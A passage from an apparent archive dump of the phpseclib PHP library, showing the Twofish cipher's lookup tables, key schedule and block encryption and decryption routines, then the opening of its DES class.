0x52F2DBDB, 0x1BF34A4A, 0x5FA63D3D, 0x9359A4A4, 0x0ABCB9B9, 0xEF3AF9F9, 0x91EF1313, 0x85FE0808, 0x49019191, 0xEE611616, 0x2D7CDEDE, 0x4FB22121, 0x8F42B1B1, 0x3BDB7272, 0x47B82F2F, 0x8748BFBF, 0x6D2CAEAE, 0x46E3C0C0, 0xD6573C3C, 0x3E859A9A, 0x6929A9A9, 0x647D4F4F, 0x2A948181, 0xCE492E2E, 0xCB17C6C6, 0x2FCA6969, 0xFCC3BDBD, 0x975CA3A3, 0x055EE8E8, 0x7AD0EDED, 0xAC87D1D1, 0x7F8E0505, 0xD5BA6464, 0x1AA8A5A5, 0x4BB72626, 0x0EB9BEBE, 0xA7608787, 0x5AF8D5D5, 0x28223636, 0x14111B1B, 0x3FDE7575, 0x2979D9D9, 0x88AAEEEE, 0x3C332D2D, 0x4C5F7979, 0x02B6B7B7, 0xB896CACA, 0xDA583535, 0xB09CC4C4, 0x17FC4343, 0x551A8484, 0x1FF64D4D, 0x8A1C5959, 0x7D38B2B2, 0x57AC3333, 0xC718CFCF, 0x8DF40606, 0x74695353, 0xB7749B9B, 0xC4F59797, 0x9F56ADAD, 0x72DAE3E3, 0x7ED5EAEA, 0x154AF4F4, 0x229E8F8F, 0x12A2ABAB, 0x584E6262, 0x07E85F5F, 0x99E51D1D, 0x34392323, 0x6EC1F6F6, 0x50446C6C, 0xDE5D3232, 0x68724646, 0x6526A0A0, 0xBC93CDCD, 0xDB03DADA, 0xF8C6BABA, 0xC8FA9E9E, 0xA882D6D6, 0x2BCF6E6E, 0x40507070, 0xDCEB8585, 0xFE750A0A, 0x328A9393, 0xA48DDFDF, 0xCA4C2929, 0x10141C1C, 0x2173D7D7, 0xF0CCB4B4, 0xD309D4D4, 0x5D108A8A, 0x0FE25151, 0x00000000, 0x6F9A1919, 0x9DE01A1A, 0x368F9494, 0x42E6C7C7, 0x4AECC9C9, 0x5EFDD2D2, 0xC1AB7F7F, 0xE0D8A8A8 ]; /** * M-Table * * @var array */ private static $m2 = [ 0xBC75BC32, 0xECF3EC21, 0x20C62043, 0xB3F4B3C9, 0xDADBDA03, 0x027B028B, 0xE2FBE22B, 0x9EC89EFA, 0xC94AC9EC, 0xD4D3D409, 0x18E6186B, 0x1E6B1E9F, 0x9845980E, 0xB27DB238, 0xA6E8A6D2, 0x264B26B7, 0x3CD63C57, 0x9332938A, 0x82D882EE, 0x52FD5298, 0x7B377BD4, 0xBB71BB37, 0x5BF15B97, 0x47E14783, 0x2430243C, 0x510F51E2, 0xBAF8BAC6, 0x4A1B4AF3, 0xBF87BF48, 0x0DFA0D70, 0xB006B0B3, 0x753F75DE, 0xD25ED2FD, 0x7DBA7D20, 0x66AE6631, 0x3A5B3AA3, 0x598A591C, 0x00000000, 0xCDBCCD93, 0x1A9D1AE0, 0xAE6DAE2C, 0x7FC17FAB, 0x2BB12BC7, 0xBE0EBEB9, 0xE080E0A0, 0x8A5D8A10, 0x3BD23B52, 0x64D564BA, 0xD8A0D888, 0xE784E7A5, 0x5F075FE8, 0x1B141B11, 0x2CB52CC2, 0xFC90FCB4, 0x312C3127, 0x80A38065, 0x73B2732A, 0x0C730C81, 0x794C795F, 0x6B546B41, 0x4B924B02, 0x53745369, 0x9436948F, 0x8351831F, 0x2A382A36, 0xC4B0C49C, 0x22BD22C8, 0xD55AD5F8, 0xBDFCBDC3, 0x48604878, 0xFF62FFCE, 0x4C964C07, 0x416C4177, 0xC742C7E6, 0xEBF7EB24, 0x1C101C14, 0x5D7C5D63, 0x36283622, 0x672767C0, 0xE98CE9AF, 0x441344F9, 0x149514EA, 0xF59CF5BB, 0xCFC7CF18, 0x3F243F2D, 0xC046C0E3, 0x723B72DB, 0x5470546C, 0x29CA294C, 0xF0E3F035, 0x088508FE, 0xC6CBC617, 0xF311F34F, 0x8CD08CE4, 0xA493A459, 0xCAB8CA96, 0x68A6683B, 0xB883B84D, 0x38203828, 0xE5FFE52E, 0xAD9FAD56, 0x0B770B84, 0xC8C3C81D, 0x99CC99FF, 0x580358ED, 0x196F199A, 0x0E080E0A, 0x95BF957E, 0x70407050, 0xF7E7F730, 0x6E2B6ECF, 0x1FE21F6E, 0xB579B53D, 0x090C090F, 0x61AA6134, 0x57825716, 0x9F419F0B, 0x9D3A9D80, 0x11EA1164, 0x25B925CD, 0xAFE4AFDD, 0x459A4508, 0xDFA4DF8D, 0xA397A35C, 0xEA7EEAD5, 0x35DA3558, 0xED7AEDD0, 0x431743FC, 0xF866F8CB, 0xFB94FBB1, 0x37A137D3, 0xFA1DFA40, 0xC23DC268, 0xB4F0B4CC, 0x32DE325D, 0x9CB39C71, 0x560B56E7, 0xE372E3DA, 0x87A78760, 0x151C151B, 0xF9EFF93A, 0x63D163BF, 0x345334A9, 0x9A3E9A85, 0xB18FB142, 0x7C337CD1, 0x8826889B, 0x3D5F3DA6, 0xA1ECA1D7, 0xE476E4DF, 0x812A8194, 0x91499101, 0x0F810FFB, 0xEE88EEAA, 0x16EE1661, 0xD721D773, 0x97C497F5, 0xA51AA5A8, 0xFEEBFE3F, 0x6DD96DB5, 0x78C578AE, 0xC539C56D, 0x1D991DE5, 0x76CD76A4, 0x3EAD3EDC, 0xCB31CB67, 0xB68BB647, 0xEF01EF5B, 0x1218121E, 0x602360C5, 0x6ADD6AB0, 0x4D1F4DF6, 0xCE4ECEE9, 0xDE2DDE7C, 0x55F9559D, 0x7E487E5A, 0x214F21B2, 0x03F2037A, 0xA065A026, 0x5E8E5E19, 0x5A785A66, 0x655C654B, 0x6258624E, 0xFD19FD45, 0x068D06F4, 0x40E54086, 0xF298F2BE, 0x335733AC, 0x17671790, 0x057F058E, 0xE805E85E, 0x4F644F7D, 0x89AF896A, 0x10631095, 0x74B6742F, 0x0AFE0A75, 0x5CF55C92, 0x9BB79B74, 0x2D3C2D33, 0x30A530D6, 0x2ECE2E49, 0x49E94989, 0x46684672, 0x77447755, 0xA8E0A8D8, 0x964D9604, 0x284328BD, 0xA969A929, 0xD929D979, 0x862E8691, 0xD1ACD187, 0xF415F44A, 0x8D598D15, 0xD6A8D682, 0xB90AB9BC, 0x429E420D, 0xF66EF6C1, 0x2F472FB8, 0xDDDFDD06, 0x23342339, 0xCC35CC62, 0xF16AF1C4, 0xC1CFC112, 0x85DC85EB, 0x8F228F9E, 0x71C971A1, 0x90C090F0, 0xAA9BAA53, 0x018901F1, 0x8BD48BE1, 0x4EED4E8C, 0x8EAB8E6F, 0xAB12ABA2, 0x6FA26F3E, 0xE60DE654, 0xDB52DBF2, 0x92BB927B, 0xB702B7B6, 0x692F69CA, 0x39A939D9, 0xD3D7D30C, 0xA761A723, 0xA21EA2AD, 0xC3B4C399, 0x6C506C44, 0x07040705, 0x04F6047F, 0x27C22746, 0xAC16ACA7, 0xD025D076, 0x50865013, 0xDC56DCF7, 0x8455841A, 0xE109E151, 0x7ABE7A25, 0x139113EF ]; /** * M-Table * * @var array */ private static $m3 = [ 0xD939A9D9, 0x90176790, 0x719CB371, 0xD2A6E8D2, 0x05070405, 0x9852FD98, 0x6580A365, 0xDFE476DF, 0x08459A08, 0x024B9202, 0xA0E080A0, 0x665A7866, 0xDDAFE4DD, 0xB06ADDB0, 0xBF63D1BF, 0x362A3836, 0x54E60D54, 0x4320C643, 0x62CC3562, 0xBEF298BE, 0x1E12181E, 0x24EBF724, 0xD7A1ECD7, 0x77416C77, 0xBD2843BD, 0x32BC7532, 0xD47B37D4, 0x9B88269B, 0x700DFA70, 0xF94413F9, 0xB1FB94B1, 0x5A7E485A, 0x7A03F27A, 0xE48CD0E4, 0x47B68B47, 0x3C24303C, 0xA5E784A5, 0x416B5441, 0x06DDDF06, 0xC56023C5, 0x45FD1945, 0xA33A5BA3, 0x68C23D68, 0x158D5915, 0x21ECF321, 0x3166AE31, 0x3E6FA23E, 0x16578216, 0x95106395, 0x5BEF015B, 0x4DB8834D, 0x91862E91, 0xB56DD9B5, 0x1F83511F, 0x53AA9B53, 0x635D7C63, 0x3B68A63B, 0x3FFEEB3F, 0xD630A5D6, 0x257ABE25, 0xA7AC16A7, 0x0F090C0F, 0x35F0E335, 0x23A76123, 0xF090C0F0, 0xAFE98CAF, 0x809D3A80, 0x925CF592, 0x810C7381, 0x27312C27, 0x76D02576, 0xE7560BE7, 0x7B92BB7B, 0xE9CE4EE9, 0xF10189F1, 0x9F1E6B9F, 0xA93453A9, 0xC4F16AC4, 0x99C3B499, 0x975BF197, 0x8347E183, 0x6B18E66B, 0xC822BDC8, 0x0E98450E, 0x6E1FE26E, 0xC9B3F4C9, 0x2F74B62F, 0xCBF866CB, 0xFF99CCFF, 0xEA1495EA, 0xED5803ED, 0xF7DC56F7, 0xE18BD4E1, 0x1B151C1B, 0xADA21EAD, 0x0CD3D70C, 0x2BE2FB2B, 0x1DC8C31D, 0x195E8E19, 0xC22CB5C2, 0x8949E989, 0x12C1CF12, 0x7E95BF7E, 0x207DBA20, 0x6411EA64, 0x840B7784, 0x6DC5396D, 0x6A89AF6A, 0xD17C33D1, 0xA171C9A1, 0xCEFF62CE, 0x37BB7137, 0xFB0F81FB, 0x3DB5793D, 0x51E10951, 0xDC3EADDC, 0x2D3F242D, 0xA476CDA4, 0x9D55F99D, 0xEE82D8EE, 0x8640E586, 0xAE78C5AE, 0xCD25B9CD, 0x04964D04, 0x55774455, 0x0A0E080A, 0x13508613, 0x30F7E730, 0xD337A1D3, 0x40FA1D40, 0x3461AA34, 0x8C4EED8C, 0xB3B006B3, 0x6C54706C, 0x2A73B22A, 0x523BD252, 0x0B9F410B, 0x8B027B8B, 0x88D8A088, 0x4FF3114F, 0x67CB3167, 0x4627C246, 0xC06727C0, 0xB4FC90B4, 0x28382028, 0x7F04F67F, 0x78486078, 0x2EE5FF2E, 0x074C9607, 0x4B655C4B, 0xC72BB1C7, 0x6F8EAB6F, 0x0D429E0D, 0xBBF59CBB, 0xF2DB52F2, 0xF34A1BF3, 0xA63D5FA6, 0x59A49359, 0xBCB90ABC, 0x3AF9EF3A, 0xEF1391EF, 0xFE0885FE, 0x01914901, 0x6116EE61, 0x7CDE2D7C, 0xB2214FB2, 0x42B18F42, 0xDB723BDB, 0xB82F47B8, 0x48BF8748, 0x2CAE6D2C, 0xE3C046E3, 0x573CD657, 0x859A3E85, 0x29A96929, 0x7D4F647D, 0x94812A94, 0x492ECE49, 0x17C6CB17, 0xCA692FCA, 0xC3BDFCC3, 0x5CA3975C, 0x5EE8055E, 0xD0ED7AD0, 0x87D1AC87, 0x8E057F8E, 0xBA64D5BA, 0xA8A51AA8, 0xB7264BB7, 0xB9BE0EB9, 0x6087A760, 0xF8D55AF8, 0x22362822, 0x111B1411, 0xDE753FDE, 0x79D92979, 0xAAEE88AA, 0x332D3C33, 0x5F794C5F, 0xB6B702B6, 0x96CAB896, 0x5835DA58, 0x9CC4B09C, 0xFC4317FC, 0x1A84551A, 0xF64D1FF6, 0x1C598A1C, 0x38B27D38, 0xAC3357AC, 0x18CFC718, 0xF4068DF4, 0x69537469, 0x749BB774, 0xF597C4F5, 0x56AD9F56, 0xDAE372DA, 0xD5EA7ED5, 0x4AF4154A, 0x9E8F229E, 0xA2AB12A2, 0x4E62584E, 0xE85F07E8, 0xE51D99E5, 0x39233439, 0xC1F66EC1, 0x446C5044, 0x5D32DE5D, 0x72466872, 0x26A06526, 0x93CDBC93, 0x03DADB03, 0xC6BAF8C6, 0xFA9EC8FA, 0x82D6A882, 0xCF6E2BCF, 0x50704050, 0xEB85DCEB, 0x750AFE75, 0x8A93328A, 0x8DDFA48D, 0x4C29CA4C, 0x141C1014, 0x73D72173, 0xCCB4F0CC, 0x09D4D309, 0x108A5D10, 0xE2510FE2, 0x00000000, 0x9A196F9A, 0xE01A9DE0, 0x8F94368F, 0xE6C742E6, 0xECC94AEC, 0xFDD25EFD, 0xAB7FC1AB, 0xD8A8E0D8 ]; /** * The Key Schedule Array * * @var array */ private $K = []; /** * The Key depended S-Table 0 * * @var array */ private $S0 = []; /** * The Key depended S-Table 1 * * @var array */ private $S1 = []; /** * The Key depended S-Table 2 * * @var array */ private $S2 = []; /** * The Key depended S-Table 3 * * @var array */ private $S3 = []; /** * Holds the last used key * * @var array */ private $kl; /** * The Key Length (in bytes) * * @see Crypt_Twofish::setKeyLength() * @var int */ protected $key_length = 16; /** * Default Constructor. * * @param string $mode * @throws BadModeException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new BadModeException('Block ciphers cannot be ran in stream mode'); } } /** * Initialize Static Variables */ protected static function initialize_static_variables() { if (is_float(self::$m3[0])) { self::$m0 = array_map('intval', self::$m0); self::$m1 = array_map('intval', self::$m1); self::$m2 = array_map('intval', self::$m2); self::$m3 = array_map('intval', self::$m3); self::$q0 = array_map('intval', self::$q0); self::$q1 = array_map('intval', self::$q1); } parent::initialize_static_variables(); } /** * Sets the key length. * * Valid key lengths are 128, 192 or 256 bits * * @param int $length */ public function setKeyLength($length) { switch ($length) { case 128: case 192: case 256: break; default: throw new \LengthException('Key of size ' . $length . ' not supported by this algorithm. Only keys of sizes 16, 24 or 32 supported'); } parent::setKeyLength($length); } /** * Sets the key. * * Rijndael supports five different key lengths * * @see setKeyLength() * @param string $key * @throws \LengthException if the key length isn't supported */ public function setKey($key) { switch (strlen($key)) { case 16: case 24: case 32: break; default: throw new \LengthException('Key of size ' . strlen($key) . ' not supported by this algorithm. Only keys of sizes 16, 24 or 32 supported'); } parent::setKey($key); } /** * Setup the key (expansion) * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupKey() */ protected function setupKey() { if (isset($this->kl['key']) && $this->key === $this->kl['key']) { // already expanded return; } $this->kl = ['key' => $this->key]; /* Key expanding and generating the key-depended s-boxes */ $le_longs = unpack('V*', $this->key); $key = unpack('C*', $this->key); $m0 = self::$m0; $m1 = self::$m1; $m2 = self::$m2; $m3 = self::$m3; $q0 = self::$q0; $q1 = self::$q1; $K = $S0 = $S1 = $S2 = $S3 = []; switch (strlen($this->key)) { case 16: list($s7, $s6, $s5, $s4) = $this->mdsrem($le_longs[1], $le_longs[2]); list($s3, $s2, $s1, $s0) = $this->mdsrem($le_longs[3], $le_longs[4]); for ($i = 0, $j = 1; $i < 40; $i += 2, $j += 2) { $A = $m0[$q0[$q0[$i] ^ $key[ 9]] ^ $key[1]] ^ $m1[$q0[$q1[$i] ^ $key[10]] ^ $key[2]] ^ $m2[$q1[$q0[$i] ^ $key[11]] ^ $key[3]] ^ $m3[$q1[$q1[$i] ^ $key[12]] ^ $key[4]]; $B = $m0[$q0[$q0[$j] ^ $key[13]] ^ $key[5]] ^ $m1[$q0[$q1[$j] ^ $key[14]] ^ $key[6]] ^ $m2[$q1[$q0[$j] ^ $key[15]] ^ $key[7]] ^ $m3[$q1[$q1[$j] ^ $key[16]] ^ $key[8]]; $B = ($B << 8) | ($B >> 24 & 0xff); $A = self::safe_intval($A + $B); $K[] = $A; $A = self::safe_intval($A + $B); $K[] = ($A << 9 | $A >> 23 & 0x1ff); } for ($i = 0; $i < 256; ++$i) { $S0[$i] = $m0[$q0[$q0[$i] ^ $s4] ^ $s0]; $S1[$i] = $m1[$q0[$q1[$i] ^ $s5] ^ $s1]; $S2[$i] = $m2[$q1[$q0[$i] ^ $s6] ^ $s2]; $S3[$i] = $m3[$q1[$q1[$i] ^ $s7] ^ $s3]; } break; case 24: list($sb, $sa, $s9, $s8) = $this->mdsrem($le_longs[1], $le_longs[2]); list($s7, $s6, $s5, $s4) = $this->mdsrem($le_longs[3], $le_longs[4]); list($s3, $s2, $s1, $s0) = $this->mdsrem($le_longs[5], $le_longs[6]); for ($i = 0, $j = 1; $i < 40; $i += 2, $j += 2) { $A = $m0[$q0[$q0[$q1[$i] ^ $key[17]] ^ $key[ 9]] ^ $key[1]] ^ $m1[$q0[$q1[$q1[$i] ^ $key[18]] ^ $key[10]] ^ $key[2]] ^ $m2[$q1[$q0[$q0[$i] ^ $key[19]] ^ $key[11]] ^ $key[3]] ^ $m3[$q1[$q1[$q0[$i] ^ $key[20]] ^ $key[12]] ^ $key[4]]; $B = $m0[$q0[$q0[$q1[$j] ^ $key[21]] ^ $key[13]] ^ $key[5]] ^ $m1[$q0[$q1[$q1[$j] ^ $key[22]] ^ $key[14]] ^ $key[6]] ^ $m2[$q1[$q0[$q0[$j] ^ $key[23]] ^ $key[15]] ^ $key[7]] ^ $m3[$q1[$q1[$q0[$j] ^ $key[24]] ^ $key[16]] ^ $key[8]]; $B = ($B << 8) | ($B >> 24 & 0xff); $A = self::safe_intval($A + $B); $K[] = $A; $A = self::safe_intval($A + $B); $K[] = ($A << 9 | $A >> 23 & 0x1ff); } for ($i = 0; $i < 256; ++$i) { $S0[$i] = $m0[$q0[$q0[$q1[$i] ^ $s8] ^ $s4] ^ $s0]; $S1[$i] = $m1[$q0[$q1[$q1[$i] ^ $s9] ^ $s5] ^ $s1]; $S2[$i] = $m2[$q1[$q0[$q0[$i] ^ $sa] ^ $s6] ^ $s2]; $S3[$i] = $m3[$q1[$q1[$q0[$i] ^ $sb] ^ $s7] ^ $s3]; } break; default: // 32 list($sf, $se, $sd, $sc) = $this->mdsrem($le_longs[1], $le_longs[2]); list($sb, $sa, $s9, $s8) = $this->mdsrem($le_longs[3], $le_longs[4]); list($s7, $s6, $s5, $s4) = $this->mdsrem($le_longs[5], $le_longs[6]); list($s3, $s2, $s1, $s0) = $this->mdsrem($le_longs[7], $le_longs[8]); for ($i = 0, $j = 1; $i < 40; $i += 2, $j += 2) { $A = $m0[$q0[$q0[$q1[$q1[$i] ^ $key[25]] ^ $key[17]] ^ $key[ 9]] ^ $key[1]] ^ $m1[$q0[$q1[$q1[$q0[$i] ^ $key[26]] ^ $key[18]] ^ $key[10]] ^ $key[2]] ^ $m2[$q1[$q0[$q0[$q0[$i] ^ $key[27]] ^ $key[19]] ^ $key[11]] ^ $key[3]] ^ $m3[$q1[$q1[$q0[$q1[$i] ^ $key[28]] ^ $key[20]] ^ $key[12]] ^ $key[4]]; $B = $m0[$q0[$q0[$q1[$q1[$j] ^ $key[29]] ^ $key[21]] ^ $key[13]] ^ $key[5]] ^ $m1[$q0[$q1[$q1[$q0[$j] ^ $key[30]] ^ $key[22]] ^ $key[14]] ^ $key[6]] ^ $m2[$q1[$q0[$q0[$q0[$j] ^ $key[31]] ^ $key[23]] ^ $key[15]] ^ $key[7]] ^ $m3[$q1[$q1[$q0[$q1[$j] ^ $key[32]] ^ $key[24]] ^ $key[16]] ^ $key[8]]; $B = ($B << 8) | ($B >> 24 & 0xff); $A = self::safe_intval($A + $B); $K[] = $A; $A = self::safe_intval($A + $B); $K[] = ($A << 9 | $A >> 23 & 0x1ff); } for ($i = 0; $i < 256; ++$i) { $S0[$i] = $m0[$q0[$q0[$q1[$q1[$i] ^ $sc] ^ $s8] ^ $s4] ^ $s0]; $S1[$i] = $m1[$q0[$q1[$q1[$q0[$i] ^ $sd] ^ $s9] ^ $s5] ^ $s1]; $S2[$i] = $m2[$q1[$q0[$q0[$q0[$i] ^ $se] ^ $sa] ^ $s6] ^ $s2]; $S3[$i] = $m3[$q1[$q1[$q0[$q1[$i] ^ $sf] ^ $sb] ^ $s7] ^ $s3]; } } $this->K = $K; $this->S0 = $S0; $this->S1 = $S1; $this->S2 = $S2; $this->S3 = $S3; } /** * _mdsrem function using by the twofish cipher algorithm * * @param string $A * @param string $B * @return array */ private function mdsrem($A, $B) { // No gain by unrolling this loop. for ($i = 0; $i < 8; ++$i) { // Get most significant coefficient. $t = 0xff & ($B >> 24); // Shift the others up. $B = ($B << 8) | (0xff & ($A >> 24)); $A <<= 8; $u = $t << 1; // Subtract the modular polynomial on overflow. if ($t & 0x80) { $u ^= 0x14d; } // Remove t * (a * x^2 + 1). $B ^= $t ^ ($u << 16); // Form u = a*t + t/a = t*(a + 1/a). $u ^= 0x7fffffff & ($t >> 1); // Add the modular polynomial on underflow. if ($t & 0x01) { $u ^= 0xa6 ; } // Remove t * (a + 1/a) * (x^3 + x). $B ^= ($u << 24) | ($u << 8); } return [ 0xff & $B >> 24, 0xff & $B >> 16, 0xff & $B >> 8, 0xff & $B]; } /** * Encrypts a block * * @param string $in * @return string */ protected function encryptBlock($in) { $S0 = $this->S0; $S1 = $this->S1; $S2 = $this->S2; $S3 = $this->S3; $K = $this->K; $in = unpack("V4", $in); $R0 = $K[0] ^ $in[1]; $R1 = $K[1] ^ $in[2]; $R2 = $K[2] ^ $in[3]; $R3 = $K[3] ^ $in[4]; $ki = 7; while ($ki < 39) { $t0 = $S0[ $R0 & 0xff] ^ $S1[($R0 >> 8) & 0xff] ^ $S2[($R0 >> 16) & 0xff] ^ $S3[($R0 >> 24) & 0xff]; $t1 = $S0[($R1 >> 24) & 0xff] ^ $S1[ $R1 & 0xff] ^ $S2[($R1 >> 8) & 0xff] ^ $S3[($R1 >> 16) & 0xff]; $R2 ^= self::safe_intval($t0 + $t1 + $K[++$ki]); $R2 = ($R2 >> 1 & 0x7fffffff) | ($R2 << 31); $R3 = ((($R3 >> 31) & 1) | ($R3 << 1)) ^ self::safe_intval($t0 + ($t1 << 1) + $K[++$ki]); $t0 = $S0[ $R2 & 0xff] ^ $S1[($R2 >> 8) & 0xff] ^ $S2[($R2 >> 16) & 0xff] ^ $S3[($R2 >> 24) & 0xff]; $t1 = $S0[($R3 >> 24) & 0xff] ^ $S1[ $R3 & 0xff] ^ $S2[($R3 >> 8) & 0xff] ^ $S3[($R3 >> 16) & 0xff]; $R0 ^= self::safe_intval($t0 + $t1 + $K[++$ki]); $R0 = ($R0 >> 1 & 0x7fffffff) | ($R0 << 31); $R1 = ((($R1 >> 31) & 1) | ($R1 << 1)) ^ self::safe_intval($t0 + ($t1 << 1) + $K[++$ki]); } // @codingStandardsIgnoreStart return pack("V4", $K[4] ^ $R2, $K[5] ^ $R3, $K[6] ^ $R0, $K[7] ^ $R1); // @codingStandardsIgnoreEnd } /** * Decrypts a block * * @param string $in * @return string */ protected function decryptBlock($in) { $S0 = $this->S0; $S1 = $this->S1; $S2 = $this->S2; $S3 = $this->S3; $K = $this->K; $in = unpack("V4", $in); $R0 = $K[4] ^ $in[1]; $R1 = $K[5] ^ $in[2]; $R2 = $K[6] ^ $in[3]; $R3 = $K[7] ^ $in[4]; $ki = 40; while ($ki > 8) { $t0 = $S0[$R0 & 0xff] ^ $S1[$R0 >> 8 & 0xff] ^ $S2[$R0 >> 16 & 0xff] ^ $S3[$R0 >> 24 & 0xff]; $t1 = $S0[$R1 >> 24 & 0xff] ^ $S1[$R1 & 0xff] ^ $S2[$R1 >> 8 & 0xff] ^ $S3[$R1 >> 16 & 0xff]; $R3 ^= self::safe_intval($t0 + ($t1 << 1) + $K[--$ki]); $R3 = $R3 >> 1 & 0x7fffffff | $R3 << 31; $R2 = ($R2 >> 31 & 0x1 | $R2 << 1) ^ self::safe_intval($t0 + $t1 + $K[--$ki]); $t0 = $S0[$R2 & 0xff] ^ $S1[$R2 >> 8 & 0xff] ^ $S2[$R2 >> 16 & 0xff] ^ $S3[$R2 >> 24 & 0xff]; $t1 = $S0[$R3 >> 24 & 0xff] ^ $S1[$R3 & 0xff] ^ $S2[$R3 >> 8 & 0xff] ^ $S3[$R3 >> 16 & 0xff]; $R1 ^= self::safe_intval($t0 + ($t1 << 1) + $K[--$ki]); $R1 = $R1 >> 1 & 0x7fffffff | $R1 << 31; $R0 = ($R0 >> 31 & 0x1 | $R0 << 1) ^ self::safe_intval($t0 + $t1 + $K[--$ki]); } // @codingStandardsIgnoreStart return pack("V4", $K[0] ^ $R2, $K[1] ^ $R3, $K[2] ^ $R0, $K[3] ^ $R1); // @codingStandardsIgnoreEnd } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupInlineCrypt() */ protected function setupInlineCrypt() { $K = $this->K; $init_crypt = ' static $S0, $S1, $S2, $S3; if (!$S0) { for ($i = 0; $i < 256; ++$i) { $S0[] = (int)$this->S0[$i]; $S1[] = (int)$this->S1[$i]; $S2[] = (int)$this->S2[$i]; $S3[] = (int)$this->S3[$i]; } } '; $safeint = self::safe_intval_inline(); // Generating encrypt code: $encrypt_block = ' $in = unpack("V4", $in); $R0 = ' . $K[0] . ' ^ $in[1]; $R1 = ' . $K[1] . ' ^ $in[2]; $R2 = ' . $K[2] . ' ^ $in[3]; $R3 = ' . $K[3] . ' ^ $in[4]; '; for ($ki = 7, $i = 0; $i < 8; ++$i) { $encrypt_block .= ' $t0 = $S0[ $R0 & 0xff] ^ $S1[($R0 >> 8) & 0xff] ^ $S2[($R0 >> 16) & 0xff] ^ $S3[($R0 >> 24) & 0xff]; $t1 = $S0[($R1 >> 24) & 0xff] ^ $S1[ $R1 & 0xff] ^ $S2[($R1 >> 8) & 0xff] ^ $S3[($R1 >> 16) & 0xff]; $R2^= ' . sprintf($safeint, '$t0 + $t1 + ' . $K[++$ki]) . '; $R2 = ($R2 >> 1 & 0x7fffffff) | ($R2 << 31); $R3 = ((($R3 >> 31) & 1) | ($R3 << 1)) ^ ' . sprintf($safeint, '($t0 + ($t1 << 1) + ' . $K[++$ki] . ')') . '; $t0 = $S0[ $R2 & 0xff] ^ $S1[($R2 >> 8) & 0xff] ^ $S2[($R2 >> 16) & 0xff] ^ $S3[($R2 >> 24) & 0xff]; $t1 = $S0[($R3 >> 24) & 0xff] ^ $S1[ $R3 & 0xff] ^ $S2[($R3 >> 8) & 0xff] ^ $S3[($R3 >> 16) & 0xff]; $R0^= ' . sprintf($safeint, '($t0 + $t1 + ' . $K[++$ki] . ')') . '; $R0 = ($R0 >> 1 & 0x7fffffff) | ($R0 << 31); $R1 = ((($R1 >> 31) & 1) | ($R1 << 1)) ^ ' . sprintf($safeint, '($t0 + ($t1 << 1) + ' . $K[++$ki] . ')') . '; '; } $encrypt_block .= ' $in = pack("V4", ' . $K[4] . ' ^ $R2, ' . $K[5] . ' ^ $R3, ' . $K[6] . ' ^ $R0, ' . $K[7] . ' ^ $R1); '; // Generating decrypt code: $decrypt_block = ' $in = unpack("V4", $in); $R0 = ' . $K[4] . ' ^ $in[1]; $R1 = ' . $K[5] . ' ^ $in[2]; $R2 = ' . $K[6] . ' ^ $in[3]; $R3 = ' . $K[7] . ' ^ $in[4]; '; for ($ki = 40, $i = 0; $i < 8; ++$i) { $decrypt_block .= ' $t0 = $S0[$R0 & 0xff] ^ $S1[$R0 >> 8 & 0xff] ^ $S2[$R0 >> 16 & 0xff] ^ $S3[$R0 >> 24 & 0xff]; $t1 = $S0[$R1 >> 24 & 0xff] ^ $S1[$R1 & 0xff] ^ $S2[$R1 >> 8 & 0xff] ^ $S3[$R1 >> 16 & 0xff]; $R3^= ' . sprintf($safeint, '$t0 + ($t1 << 1) + ' . $K[--$ki]) . '; $R3 = $R3 >> 1 & 0x7fffffff | $R3 << 31; $R2 = ($R2 >> 31 & 0x1 | $R2 << 1) ^ ' . sprintf($safeint, '($t0 + $t1 + ' . $K[--$ki] . ')') . '; $t0 = $S0[$R2 & 0xff] ^ $S1[$R2 >> 8 & 0xff] ^ $S2[$R2 >> 16 & 0xff] ^ $S3[$R2 >> 24 & 0xff]; $t1 = $S0[$R3 >> 24 & 0xff] ^ $S1[$R3 & 0xff] ^ $S2[$R3 >> 8 & 0xff] ^ $S3[$R3 >> 16 & 0xff]; $R1^= ' . sprintf($safeint, '$t0 + ($t1 << 1) + ' . $K[--$ki]) . '; $R1 = $R1 >> 1 & 0x7fffffff | $R1 << 31; $R0 = ($R0 >> 31 & 0x1 | $R0 << 1) ^ ' . sprintf($safeint, '($t0 + $t1 + ' . $K[--$ki] . ')') . '; '; } $decrypt_block .= ' $in = pack("V4", ' . $K[0] . ' ^ $R2, ' . $K[1] . ' ^ $R3, ' . $K[2] . ' ^ $R0, ' . $K[3] . ' ^ $R1); '; $this->inline_crypt = $this->createInlineCryptFunction( [ 'init_crypt' => $init_crypt, 'init_encrypt' => '', 'init_decrypt' => '', 'encrypt_block' => $encrypt_block, 'decrypt_block' => $decrypt_block ] ); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DES.php000064400000206270147600400120020205 0ustar00 * setKey('abcdefgh'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $des->decrypt($des->encrypt($plaintext)); * ?> * * * @author Jim Wigginton * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\BlockCipher; use phpseclib3\Exception\BadModeException; /** * Pure-PHP implementation of DES. * * @author Jim Wigginton */ class DES extends BlockCipher { /** * Contains $keys[self::ENCRYPT] * * @see \phpseclib3\Crypt\DES::setupKey() * @see \phpseclib3\Crypt\DES::processBlock() */ const ENCRYPT = 0; /** * Contains $keys[self::DECRYPT] * * @see \phpseclib3\Crypt\DES::setupKey() * @see \phpseclib3\Crypt\DES::processBlock() */ const DECRYPT = 1; /** * Block Length of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size * @var int */ protected $block_size = 8; /** * Key Length (in bytes) * * @see \phpseclib3\Crypt\Common\SymmetricKey::setKeyLength() * @var int */ protected $key_length = 8; /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'des'; /** * The OpenSSL names of the cipher / modes * * @see \phpseclib3\Crypt\Common\SymmetricKey::openssl_mode_names * @var array */ protected $openssl_mode_names = [ self::MODE_ECB => 'des-ecb', self::MODE_CBC => 'des-cbc', self::MODE_CFB => 